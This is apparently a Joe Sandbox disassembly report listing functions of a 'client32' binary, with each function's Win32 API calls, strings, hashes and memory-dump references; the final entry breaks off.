Opcode ID: 7e232c99ebf281e410bb9d0860d8d41d87a8ea0c949d0995e18e01e078c499d0
Instruction ID: 1043d7f6ea24edd6c6d83fc4c61c48490bcd62149010b5c038bd04a9978f8638
Opcode Fuzzy Hash: 7e232c99ebf281e410bb9d0860d8d41d87a8ea0c949d0995e18e01e078c499d0
Instruction Fuzzy Hash: C8E06572A802246FD310DFA5D844A97F7D8EB58761F00C52AF98997600D670A844CFA0

Function 1101B990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101B9A4
SetLastError.KERNEL32(00000078), ref: 1101B9C1

Strings

FlashWindowEx, xrefs: 1101B99E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: FlashWindowEx
API String ID: 199729137-2859592226
Opcode ID: d149787753d8d2d84a0ecce9859625c2a5d191349cf838303432e1a6735ed8e5
Instruction ID: 2ec4ae941f57900b93c970ecfa1e82db8788f76ee671714e22cfe94d9e586cea
Opcode Fuzzy Hash: d149787753d8d2d84a0ecce9859625c2a5d191349cf838303432e1a6735ed8e5
Instruction Fuzzy Hash: 2EE09272A406245FC350EFE5D984F8BFBE8EF54731F00442AE98297604C634F840CBA0

Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001091
m_hWnd, xrefs: 11001096

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-1557312927
Opcode ID: 7af6d590896ff1dfbcac7f380829b7aab34670307aa9b842ebd1b5702f891b1a
Instruction ID: 959fc845a7b13bf9de0acd13928d7ecdd6b58ad8c2d11ea6b61d336c87b12d71
Opcode Fuzzy Hash: 7af6d590896ff1dfbcac7f380829b7aab34670307aa9b842ebd1b5702f891b1a
Instruction Fuzzy Hash: A8E01AB6610219BFD314CE85EC40ED7B3ADEB48354F008519F95997240D6B0E850CBB1

Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001073

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001051
m_hWnd, xrefs: 11001056

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-1557312927
Opcode ID: 563ac9448ad9209c405835ae6ffe744044af7d71d485e160b5cdb4f271289dda
Instruction ID: 4a608db799e5a9afbdf3b9bc31dfafed9475bd885bd203aecf675f076c5a0dbd
Opcode Fuzzy Hash: 563ac9448ad9209c405835ae6ffe744044af7d71d485e160b5cdb4f271289dda
Instruction Fuzzy Hash: 90E046B6A00219BFD210CE85DC85EDAB3ACFB58324F00C429F91987240D6B0E850CBA1

Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001103

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110010E1
m_hWnd, xrefs: 110010E6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-1557312927
Opcode ID: 49ceb5e28b7757a3c3378fb78ae6eab82e85225ab6ba3376b7b480bd37d390ef
Instruction ID: b9cf230d2c9f3a88a66f013921ab9639df1a4187879fb0e609e6af44bdfe2f68
Opcode Fuzzy Hash: 49ceb5e28b7757a3c3378fb78ae6eab82e85225ab6ba3376b7b480bd37d390ef
Instruction Fuzzy Hash: 3DE04F76A00219BFD215CE45DC45ED6B3ACFB48314F00C429F91487640D6B0F850CBA1

Function 110153B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 110153DB

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110153C1
m_hWnd, xrefs: 110153C6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-1557312927
Opcode ID: 1b926b9716b0b64936cb5e1a2271b180302512e4999b4c0638f729702118aa4d
Instruction ID: 1d7125962cf813140b05ce340ba898871e4843448dff8cc316c5671598320007
Opcode Fuzzy Hash: 1b926b9716b0b64936cb5e1a2271b180302512e4999b4c0638f729702118aa4d
Instruction Fuzzy Hash: EEE04F7AA00315AFC215DA95D840E96F3A9AB58314F00C419ED5547740D775E940CBA1

Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100113B

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001121
m_hWnd, xrefs: 11001126

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-1557312927
Opcode ID: 578e6b42e3a466468ed5f8b48cc10b3d5d2de952ef15857138e468b3388b4fb8
Instruction ID: 76fc1c9f204d61b598545802c88e505d5d1a1f0333807163ca50a8fc43eda729
Opcode Fuzzy Hash: 578e6b42e3a466468ed5f8b48cc10b3d5d2de952ef15857138e468b3388b4fb8
Instruction Fuzzy Hash: 46D02E76A10328BFC2289A42EC01EC2F3ECAB143A8F008029FA1443240D671E840CBA1

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001011
m_hWnd, xrefs: 11001016

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-1557312927
Opcode ID: 1770e36260f19dc7d9c9f2fc614e6a2aa219c11bc3183004388498927ffce4b8
Instruction ID: 85a83e753ce2334310b605be9e6b37dc2aa326c5352e60b6a277888e17089f80
Opcode Fuzzy Hash: 1770e36260f19dc7d9c9f2fc614e6a2aa219c11bc3183004388498927ffce4b8
Instruction Fuzzy Hash: A7D05E77A10329BFD225DA56EC45ED6F3DDEB18368F00C429FA4557640D7B1E880CBA2

Function 1103B000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(NSMClassList,00000000), ref: 1103B00F
SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103B027

Strings

NSMClassList, xrefs: 1103B00A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: NSMClassList
API String ID: 1741975844-2474587545
Opcode ID: 0c65c2155593c244e98b49570bad4efc5dd94f5243094f64a045e500cd371313
Instruction ID: 412497618096f6ceebb2c8e5b1c93f20f04941736e5984ac9c6eab23f84d4a3b
Opcode Fuzzy Hash: 0c65c2155593c244e98b49570bad4efc5dd94f5243094f64a045e500cd371313
Instruction Fuzzy Hash: 4ED01232200624BBE6109B95DD49FA7FB9CEB89B55F058055F6199A180C661D40087A0

Function 1100D4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(1100D71E,?,00000000,?,1100CA4A,?), ref: 1100D4A9
LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA4A,?), ref: 1100D4B8

Strings

AudioCapture.dll, xrefs: 1100D4B3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoadVersion
String ID: AudioCapture.dll
API String ID: 3209957514-2642820777
Opcode ID: e67a74e394a46cd4a230a294111d6738ecbe5b9cda1371316a140dce9fca34bc
Instruction ID: 25e691207691642c4356b8f3de2543ca62ce68b30f69e8b4a8df66a417ae823a
Opcode Fuzzy Hash: e67a74e394a46cd4a230a294111d6738ecbe5b9cda1371316a140dce9fca34bc
Instruction Fuzzy Hash: 82E01735E215639BF7028B3A888838DB3D1B74128AFC694B0EC26C0948FB28D4409F31

Function 110150C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000000,1104FCA6,00000041,00000040,00000001,0000004F,_debug,platformid,00000000), ref: 110150D7
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1116F448,000000FF,?,1105018C), ref: 110150E8

Strings

\\.\NSWFPDrv, xrefs: 110150D2

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: 6231527e6390726173594491354c6e4cd092e0601a9bcb34ddaadc10646ea3e9
Instruction ID: 75e221cb1509f29626dfc12a380aed5e2f5bc3ba1cdec89b9f211e34a1aec4b9
Opcode Fuzzy Hash: 6231527e6390726173594491354c6e4cd092e0601a9bcb34ddaadc10646ea3e9
Instruction Fuzzy Hash: F3D0C972A020347EE27116AAAC4CFCBBE09DB037B5F294264FA2EE55C4A6544C4186F0

Function 11125920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001,?,11047486), ref: 11125946

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1112592E
m_hWnd, xrefs: 11125933

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-1557312927
Opcode ID: 204b1829b71a280764fd199e5957d6e8a8d9a1bd537b1884df3738c1ed326824
Instruction ID: 9fa4c533130b37625838377c99370bc9f0c5ea9d34023ae3aac24fcf743b4944
Opcode Fuzzy Hash: 204b1829b71a280764fd199e5957d6e8a8d9a1bd537b1884df3738c1ed326824
Instruction Fuzzy Hash: 03D0A736A10721AFD6314626EC45FC1F6D55B05318F00C419F9455B580D3B0A4C1CB66

Function 111499A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 111499A8
GetPropA.USER32(?,OldMenu), ref: 111499B8

Strings

OldMenu, xrefs: 111499B2

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuProp
String ID: OldMenu
API String ID: 601939786-3235417843
Opcode ID: ff0bf9331c9e8b3eb56667db6fb023d1c3372ff7e918dd1ac3b2c2839cd45903
Instruction ID: 0738b72f32ee0d1513da5d848264d4facd948a35df405a582f744c560893b297
Opcode Fuzzy Hash: ff0bf9331c9e8b3eb56667db6fb023d1c3372ff7e918dd1ac3b2c2839cd45903
Instruction Fuzzy Hash: 93C0123750257DBB83021E959D089CEFB5DBE0A5A53408021F90092104F724554187E5

Function 1100D770 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111D89EC,00000000,?,?,1100C13B,00000000,00000000), ref: 1100D77F
